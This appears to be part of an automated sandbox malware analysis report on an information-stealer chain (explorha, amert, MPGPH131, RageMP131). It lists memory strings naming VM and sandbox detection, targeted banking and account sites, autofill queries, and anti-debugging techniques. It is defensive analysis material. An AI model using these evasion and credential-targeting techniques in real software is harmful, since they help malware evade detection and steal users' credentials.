Source: MPGPH131.exe, 0000001C.00000003.3062426887.0000000007CBF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,1169642865h
Source: MPGPH131.exe, 0000001C.00000002.3251490227.0000000007C50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}lfons\AppData\Local\Temp\heidivqkoBMIvF7c3\yFCGJeJiS2CNWeb Dataion VA
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware20,11696428655
Source: MPGPH131.exe, 0000001C.00000002.3245487291.00000000013C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: c884f8452a.exe, 00000014.00000003.2982037903.000000000811B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ebrokers.co.inVMware20,11696428655d
Source: c884f8452a.exe, 00000014.00000002.3272062949.000000000168F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}M`p
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CT name, value FROM autofillmain'.sqlite_masterr global passwords blocklistVMware20,11696428655
Source: MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\*
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: explorha.exe, explorha.exe, 00000003.00000002.2151500663.00000000008EF000.00000040.00000001.01000000.00000008.sdmp, amert.exe, amert.exe, 0000000E.00000002.2840617908.0000000000556000.00000040.00000001.01000000.0000000F.sdmp, chrosha.exe, 0000000F.00000002.2880866448.0000000000266000.00000040.00000001.01000000.00000010.sdmp, c884f8452a.exe, 00000014.00000002.3269980553.0000000000D6E000.00000040.00000001.01000000.00000014.sdmp, MPGPH131.exe, 0000001C.00000002.3244453808.0000000000B5E000.00000040.00000001.01000000.00000015.sdmp, MPGPH131.exe, 0000001D.00000002.3252347370.0000000000B5E000.00000040.00000001.01000000.00000015.sdmp, c884f8452a.exe, 00000024.00000002.3145407488.0000000000D6E000.00000040.00000001.01000000.00000014.sdmp, RageMP131.exe, 0000002D.00000002.3204809220.000000000063E000.00000040.00000001.01000000.00000017.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: c884f8452a.exe, 00000014.00000002.3272062949.000000000167A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW =k
Source: MPGPH131.exe, 0000001C.00000002.3245487291.00000000013D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ?\#disk&ven_vmware&prouask#4&1656f219&0&0000f5-b6bf-11d0-94f2-00a08b
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: RageMP131.exe, 0000002D.00000003.3144245338.00000000017DF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,116
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428
Source: MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}x%
Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: RageMP131.exe, 0000002D.00000003.3144245338.00000000017DF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}<
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}*
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rootpagecomVMware20,11696428655o
Source: c884f8452a.exe, 00000014.00000003.2982037903.000000000811B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: s.portal.azure.comVMware20,11696428655
Source: c884f8452a.exe, 00000014.00000003.2982037903.000000000811B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696
Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: RageMP131.exe, 0000002D.00000002.3206727588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}!
Source: MPGPH131.exe, 0000001C.00000003.3062426887.0000000007CBF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428p
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pageformVMware20,11696428655
Source: 831840b410.exe, 0000001F.00000003.3237964866.0000000004062000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\m
Source: MPGPH131.exe, 0000001D.00000003.2969808776.0000000001284000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6b
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: MPGPH131.exe, 0000001D.00000002.3260757823.0000000007A1E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}cGVhZm1tZ2RwZmtvZ2tnaGNwaWhh2j4FMS4yLjDgPtDD9agG6D4A6D4G6D4L8D7Qw/WoBsoBWggBEAUYAiAAKAAwADgAQABIAFAAWABgAGgAeACAAQDIPgPSPiBtaGpmYm1kZ2NmamJicGFlb2pvZm9ob2VmZ2llaGphado+ATHgPtDD9agG6D4A8D7Qw/WoBsoBXggBEAUYAiAAKAAwADgAQABIAFAAWABgAGgCeACAAQDIPgPSPiBuY2JqZWxwamNoa3BiaWticGtjY2hraGtibG9kb2FtYdo+BTIuMC4y4D7Qw/WoBug+APA+0MP1qAbKAV8IARAFGAIgACgAMAA4AEAASABQAFgAYABoAngAgAEAyD4D0j4gbmtlaW1ob2dqZHBucGNjb29mcGxpaW1hYWhtYWFvbWXaPgYxLjMuMjHgPtDD9agG6D4A8D7Qw/WoBvgBsiiAAv///////////wGIAgGoAoQXsgIQd6OHVV3LMHKvjeie9v2i18o+1wcKBAgAEAASEgoCCAMSAggIGgIIASIECAAQARoPCg1ub19lbnYtbm9fdmVyIgIIAjJiCAAaLDQ3REVRcGo4SEJTYSsvVEltVys1SkNldVFlUmttNU5NcEpXWkczaFN1RlU9Ii4icFpMaFRhSjIzaE41dVF4d3p1MEsyQ1llcy9kdkp1RTkzVmJJVlYvTG5SQT0iKgA6Cwjz///v9/////8BQikSCjEuMy4xNzcuMTEYBSAAKg5SZWdLZXlOb3RGb3VuZDIHd2luZG93c1ICCAFa/AUJdZMYBFaWU0AR3SQGgZVTRkAZAAAAAAAAWUAZAAAAAAAANEAZAAAAAAAAWUAZAAAAAAAA8D8ZAAAAAAAA8D8ZAAAAAAAAAAAZAAAAAAAAAAAZAAAAAAAAWUAZAAAAAAAAWUAZAAAAAAAAWUAZAAAAAAAAWUAZAAAAAAAAWUAZAAAAAAAAWUAZAAAAAAAAWUAZAAAAAAAANEAZAAAAAAAAWUAZAAAAAAAAAAAZAAAAAAAAWUAZAAAAAAAAWUAZAAAAAAAAWUAZAAAAAAAA8D8ZAAAAAAAA8D8yFQiH9N6X29eyvKYBEggIABABIJCABDISCNvpsoebrM36GRIGCAAQASAQMhII++qnh8mYwYhfEgYIABABIBAyEgjozNnlpJyeyzkSBggAEAEgEDITCOC54qSdyuvjjgESBggAEAEgEDISCNn9xMr9td2KbRIGCAAQASAQMhIIgteJ4NSXj9E2EgYIABABIBAyEgjmzv2twIj8gn4SBggAEAEgEDIUCKfHy9mkub6BwwESBwgBEAEgkGAyFQiauYjc7KfS3OEBEggIABABIJCABDITCJnwsYm4+NWOLBIHCAEQASCQYDIUCNHJvLvV2cza5wESBwgBEAEgkGAyEwiQrNz7jbLTpQwSBwgBEAEgkGAyEgjVuuKf55342XkSBggAEAEgEDITCPeTqZiGj5aaSRIHCAEQASCQYDISCLPMhM/6sZX2NRIGCAAQASAQMhIIh6SA76Kw0u9WEgYIABABIBAyEwjcx7n5qNnem6MBEgYIABABIBAyFAjKvKW5jY/Wx+cBEgcIARABIJBgMhQIwqf5grzUgKTqARIHCAEQASCQYDIWCJiYntn49dXkggESCQgAEAEggICACDITCMuAzLDq3NSUzwESBggAEAEgEDITCIS9vZeNgI79kgESBggAEAEgEDITCP7Mx9PU/OC9iQESBggAEAEgEDISCNKq8/iqnu6OFRIGCAAQASAQMhQImuHa5M/ohPHnARIHCAEQASCQYHoCCACCAQIYAA==metameta
Source: SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe, 00000000.00000002.2139776155.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp, explorha.exe, 00000002.00000002.2131038035.00000000008EF000.00000040.00000001.01000000.00000008.sdmp, explorha.exe, 00000003.00000002.2151500663.00000000008EF000.00000040.00000001.01000000.00000008.sdmp, amert.exe, 0000000E.00000002.2840617908.0000000000556000.00000040.00000001.01000000.0000000F.sdmp, chrosha.exe, 0000000F.00000002.2880866448.0000000000266000.00000040.00000001.01000000.00000010.sdmp, c884f8452a.exe, 00000014.00000002.3269980553.0000000000D6E000.00000040.00000001.01000000.00000014.sdmp, MPGPH131.exe, 0000001C.00000002.3244453808.0000000000B5E000.00000040.00000001.01000000.00000015.sdmp, MPGPH131.exe, 0000001D.00000002.3252347370.0000000000B5E000.00000040.00000001.01000000.00000015.sdmp, c884f8452a.exe, 00000024.00000002.3145407488.0000000000D6E000.00000040.00000001.01000000.00000014.sdmp, RageMP131.exe, 0000002D.00000002.3204809220.000000000063E000.00000040.00000001.01000000.00000017.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: MPGPH131.exe, 0000001D.00000002.3260532533.0000000007940000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}u.gn,v.gn,w.gn,x.gn,y.gn,z.gn,a.hk,b.hk,c.hk,d.hk,e.hk,f.hk,g.hk,h.hk,i.hk,j.hk,k.hk,l.hk,m.hk,n.hk,o.hk,p
Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: c884f8452a.exe, 00000014.00000003.2982037903.000000000811B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: billing_address_id.comVMware20,11696428
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: c884f8452a.exe, 00000014.00000003.2982037903.000000000811B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .utiitsl.comVMware20,1169642865
Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: MPGPH131.exe, 0000001D.00000002.3260532533.0000000007940000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}<
Source: rundll32.exe, 00000008.00000002.2871819933.000001E17AF41000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2871819933.000001E17AE8F000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000002.3272062949.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001C.00000002.3245487291.00000000013C7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000001D.00000002.3253650821.00000000012A1000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000002.3143187486.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000002.3143187486.00000000005C0000.00000004.00000020.00020000.00000000.sdmp, c884f8452a.exe, 00000024.00000002.3143187486.000000000060A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: MPGPH131.exe, 0000001D.00000003.2969808776.0000000001284000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: eVMware20,11696428655
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,1169642865
Source: c884f8452a.exe, 00000014.00000002.3280096095.0000000007EE5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}-
Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: c884f8452a.exe, 00000014.00000003.2980525075.0000000008111000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428(
Source: MPGPH131.exe, 0000001C.00000002.3245487291.00000000013F7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}ta\*
Source: MPGPH131.exe, 0000001C.00000003.2969098995.00000000013DF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}p.
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: c884f8452a.exe, 00000014.00000003.2982037903.000000000811B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: nickname.utiitsl.comVMware20,1169642865
Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: c884f8452a.exe, 00000024.00000003.3078423333.00000000005D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ra Change Transaction PasswordVMware20,11696428655
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: o.inVMware20,11696428655~
Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: c884f8452a.exe, 00000014.00000003.2910333691.0000000001691000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Cry
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: RageMP131.exe, 0000002D.00000002.3206727588.00000000017C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
Source: c884f8452a.exe, 00000014.00000003.2910333691.0000000001691000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: c884f8452a.exe, 00000014.00000002.3272062949.000000000168F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000{`p
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HARtive Brokers - non-EU EuropeVMware20,11696428655
Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: c884f8452a.exe, 00000014.00000003.2980525075.0000000008111000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,1169642865
Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: c884f8452a.exe, 00000014.00000002.3272062949.00000000016CC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}x
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: RageMP131.exe, 0000002D.00000002.3206727588.00000000017FA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWg>_I
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: comVMware20,11696428655o
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: MPGPH131.exe, 0000001D.00000003.3065747274.00000000079F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: netsh.exe, 00000009.00000002.2741856372.000001F406E37000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000009.00000003.2741173735.000001F406E34000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 831840b410.exe, 00000010.00000002.3115654406.0000000000FCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: MPGPH131.exe, 0000001D.00000002.3253650821.000000000126D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(<+
Source: MPGPH131.exe, 0000001D.00000003.3058245130.0000000007DCB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tive Brokers - non-EU EuropeVMware20,11696428655
Source: MPGPH131.exe, 0000001D.00000002.3254763388.0000000001304000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_9A5A6814
Source: MPGPH131.exe, 0000001C.00000002.3251490227.0000000007C9B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_9A5A6814ZokPL[g
Source: c884f8452a.exe, 00000024.00000002.3143187486.0000000000568000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe System information queried: CodeIntegrityInformation
Hides threads from debuggers
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Thread information set: HideFromDebugger
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Thread information set: HideFromDebugger
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Thread information set: HideFromDebugger
Potentially malicious time measurement code found
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Code function: 0_2_051F0A3C Start: 051F0B37 End: 051F0AAB 0_2_051F0A3C
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
